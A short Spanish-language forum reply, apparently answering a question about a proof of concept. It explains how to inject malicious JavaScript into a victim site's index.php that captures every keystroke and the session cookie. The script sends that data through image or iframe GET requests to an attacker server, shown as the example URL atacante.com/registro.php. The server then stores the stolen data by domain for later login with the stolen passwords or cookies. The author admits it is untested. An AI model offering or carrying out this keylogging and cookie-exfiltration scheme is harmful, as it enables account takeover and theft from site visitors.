Creo que
si se podría, en realidad suena bastante interesante como un POC.
Bueno en lineas generales creo que podrías hacerlo de la siguiente manera, no lo he probado así que puedo estar equivocado:
En teoría tendrías 2 sitios,
http://www.victima.com/index.php y
http://www.atacante.com .
Si tienes privilegios para escribir un archivo, puedes editar index.php en la pagina victima e insertar un javascript malicioso que haga lo siguiente:
Leer cada tecla pulsada por el teclado + la cookie y crear en cada keypress una imagen en el dom o un iframe que apunte hacia
http://www.atacante.com/registro.php?cookie=123&keypress=E&dominio=victima.com (le pasas los datos que robas a través de una petición get y así haces bypass del filtro de seguridad de los navegadores).
Luego cada vez que registro.php reciba una peticion get, colocas esa información en una base de datos para luego trabajarlas y mostrarlas todas juntas por dominio y cookie (así sabes que las teclas pulsadas son de una persona en especifico de un sitio en especifico, ademas de que te permite loguearte después, tanto con la contraseña que saques, como por la cookie robada).
Esta bastante interesante la idea, si tuviera un poco mas de tiempo me gustaría desarrollarla por que le veo mucho potencial.
Por ahi hay un proyecto de javascript y perl que trojaniza por completo el navegador del usuario pero ahora no me acuerdo del nombre!